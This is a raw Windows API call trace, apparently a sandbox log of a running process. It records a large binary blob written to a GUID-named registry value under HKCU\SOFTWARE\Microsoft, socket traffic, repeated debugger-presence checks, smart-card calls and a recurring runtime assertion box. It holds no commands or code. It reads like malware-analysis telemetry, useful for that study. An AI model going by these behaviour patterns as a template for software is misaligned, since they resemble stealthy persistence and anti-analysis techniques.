	[0114.631] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aef88 | out: lpPreviousCount=0x20aef88) returned 1
	[0114.634] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d6f30 | out: phkResult=0x26d6f30*=0xba8) returned 0x0
	[0114.634] RegCreateKeyExW (in: hKey=0xba8, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x26d6f2c, lpdwDisposition=0x0 | out: phkResult=0x26d6f2c*=0xbac, lpdwDisposition=0x0) returned 0x0
	[0114.634] RegSetValueExW (in: hKey=0xbac, lpValueName="{102f49a9-80c9-42ee-8924-3256738fc621}", Reserved=0x0, dwType=0x3, lpData=0x52ed570*, cbData=0x7c49 | out: lpData=0x52ed570*) returned 0x0
	[0114.730] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.730] GetLastError () returned 0xcb
	[0114.730] SetLastError (dwErrCode=0x0) 
	[0114.730] SetLastError (dwErrCode=0x0) 
	[0114.730] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344) returned -1
	[0114.731] GetLastError () returned 0x3e5
	[0114.731] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0114.731] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819723700000) returned 1
	[0114.731] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819723700000) returned 1
	[0114.731] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0114.731] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0114.731] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0114.731] IsDebuggerPresent () returned 0
	[0114.732] GetProcessWindowStation () returned 0x84
	[0114.732] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0114.732] GetActiveWindow () returned 0x0
	[0114.732] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0115.037] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0115.037] GetLastError () returned 0xcb
	[0115.037] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0115.038] GetLastError () returned 0xcb
	[0115.038] SetLastError (dwErrCode=0x0) 
	[0115.038] SetLastError (dwErrCode=0x0) 
	[0115.038] SetLastError (dwErrCode=0x0) 
	[0115.038] SetLastError (dwErrCode=0x0) 
	[0115.038] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] SetLastError (dwErrCode=0x0) 
	[0115.039] WSASend (in: s=0xa24, lpBuffers=0x20af538*=((len=0x3b5, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20af4a0, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af538*=((len=0x3b5, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20af4a0*=0x3b5, lpOverlapped=0x51cfa90) returned 0
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] GetLastError () returned 0x0
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] GetLastError () returned 0x0
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] SetLastError (dwErrCode=0x0) 
	[0115.044] GetLastError () returned 0x0
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.045] GetLastError () returned 0x0
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.045] GetLastError () returned 0x0
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.045] GetLastError () returned 0x0
	[0115.045] SetLastError (dwErrCode=0x0) 
	[0115.046] SetLastError (dwErrCode=0x0) 
	[0115.046] SetLastError (dwErrCode=0x0) 
	[0115.046] GetLastError () returned 0x0
	[0115.046] SetLastError (dwErrCode=0x0) 
	[0115.046] GetLastError () returned 0x0
	[0115.046] SetLastError (dwErrCode=0x0) 
	[0115.046] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0115.046] GetLastError () returned 0x102
	[0115.046] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819755300000) returned 1
	[0115.047] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0115.047] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0115.047] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0115.047] IsDebuggerPresent () returned 0
	[0115.047] GetProcessWindowStation () returned 0x84
	[0115.047] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0115.047] GetActiveWindow () returned 0x0
	[0115.047] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0115.285] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0115.285] GetLastError () returned 0xcb
	[0115.285] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0115.285] GetLastError () returned 0xcb
	[0115.285] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x7a, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0115.285] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819779200000) returned 1
	[0115.286] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819779200000) returned 1
	[0115.286] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0115.286] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0115.286] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0115.287] IsDebuggerPresent () returned 0
	[0115.287] GetProcessWindowStation () returned 0x84
	[0115.287] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0115.287] GetActiveWindow () returned 0x0
	[0115.287] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0115.497] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x4000, buf=0x2722fd8*)), lpNumberOfBytesRecvd=0x20afbf0*=0x9a, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0115.497] SetLastError (dwErrCode=0x0) 
	[0115.497] SetLastError (dwErrCode=0x0) 
	[0115.497] SetLastError (dwErrCode=0x0) 
	[0115.497] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.497] GetLastError () returned 0xcb
	[0115.497] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.497] GetLastError () returned 0xcb
	[0115.498] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b00\x52\x2b0e\x413\x2b04\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0115.498] GetLastError () returned 0xcb
	[0115.498] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0115.498] GetLastError () returned 0xcb
	[0115.498] SetLastError (dwErrCode=0x0) 
	[0115.498] SetLastError (dwErrCode=0x0) 
	[0115.498] SetLastError (dwErrCode=0x0) 
	[0115.498] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.498] GetLastError () returned 0xcb
	[0115.498] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.498] GetLastError () returned 0xcb
	[0115.499] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0115.499] GetLastError () returned 0xcb
	[0115.499] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0115.499] GetLastError () returned 0xcb
	[0115.499] SetLastError (dwErrCode=0x0) 
	[0115.499] SetLastError (dwErrCode=0x0) 
	[0115.499] SetLastError (dwErrCode=0x0) 
	[0115.499] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.499] GetLastError () returned 0xcb
	[0115.500] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.500] GetLastError () returned 0xcb
	[0115.500] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b58\x52\x2b0e\x413\x2b5c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0115.500] GetLastError () returned 0xcb
	[0115.500] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0115.500] GetLastError () returned 0xcb
	[0115.500] SetLastError (dwErrCode=0x0) 
	[0115.500] SetLastError (dwErrCode=0x0) 
	[0115.500] SetLastError (dwErrCode=0x0) 
	[0115.500] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.500] GetLastError () returned 0xcb
	[0115.501] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0115.501] GetLastError () returned 0xcb
	[0115.501] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b84\x52\x2b0e\x413\x2b88\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0115.501] GetLastError () returned 0xcb
	[0115.501] timeGetTime () returned 0x30561
	[0115.501] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f13c, nSize=0x7fff | out: lpBuffer="\x3ac8\x52\x4bf8\x25b") returned 0x0
	[0115.501] GetLastError () returned 0xcb
	[0115.502] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0115.502] GetLastError () returned 0xcb
	[0115.502] SetLastError (dwErrCode=0x0) 
	[0115.502] SetLastError (dwErrCode=0x0) 
	[0115.502] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344) returned -1
	[0115.502] GetLastError () returned 0x3e5
	[0115.502] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0115.502] GetLastError () returned 0x102
	[0115.502] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819800900000) returned 1
	[0115.508] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0115.509] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0115.509] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0115.509] IsDebuggerPresent () returned 0
	[0115.509] GetProcessWindowStation () returned 0x84
	[0115.509] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0115.509] GetActiveWindow () returned 0x0
	[0115.509] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0115.791] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0116.032] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x29, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0116.084] GetLastError () returned 0x102
	[0116.084] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1819859100000) returned 1
	[0116.084] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819859100000) returned 1
	[0116.084] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0116.085] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0116.086] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0116.086] IsDebuggerPresent () returned 0
	[0116.086] GetProcessWindowStation () returned 0x84
	[0116.086] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0116.086] GetActiveWindow () returned 0x0
	[0116.086] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0116.340] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3b3, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0117.310] GetLastError () returned 0x102
	[0117.311] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1819981700000) returned 1
	[0117.311] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819981800000) returned 1
	[0117.312] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0117.312] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0117.312] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0117.312] IsDebuggerPresent () returned 0
	[0117.312] GetProcessWindowStation () returned 0x84
	[0117.312] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0117.313] GetActiveWindow () returned 0x0
	[0117.313] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0117.499] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0117.614] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x1d, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0117.652] GetLastError () returned 0x102
	[0117.652] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820015900000) returned 1
	[0117.652] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820015900000) returned 1
	[0117.653] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0117.653] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0117.653] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0117.653] IsDebuggerPresent () returned 0
	[0117.653] GetProcessWindowStation () returned 0x84
	[0117.654] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0117.654] GetActiveWindow () returned 0x0
	[0117.654] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0117.958] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3c1, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0118.919] GetLastError () returned 0x102
	[0118.919] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820142600000) returned 1
	[0118.919] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820142600000) returned 1
	[0118.919] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0118.920] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0118.920] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0118.920] IsDebuggerPresent () returned 0
	[0118.920] GetProcessWindowStation () returned 0x84
	[0118.920] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0118.920] GetActiveWindow () returned 0x0
	[0118.920] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0119.140] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0119.195] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x27, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0119.238] GetLastError () returned 0x102
	[0119.238] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820174600000) returned 1
	[0119.240] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820174700000) returned 1
	[0119.240] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0119.241] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0119.241] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0119.241] IsDebuggerPresent () returned 0
	[0119.241] GetProcessWindowStation () returned 0x84
	[0119.241] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0119.241] GetActiveWindow () returned 0x0
	[0119.241] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0119.577] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3ba, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0120.531] GetLastError () returned 0x102
	[0120.531] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3c8 | out: lpPerformanceCount=0x20af3c8*=1820303800000) returned 1
	[0120.531] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1820303800000) returned 1
	[0120.532] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0120.532] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0120.532] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0120.532] IsDebuggerPresent () returned 0
	[0120.533] GetProcessWindowStation () returned 0x84
	[0120.533] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0120.533] GetActiveWindow () returned 0x0
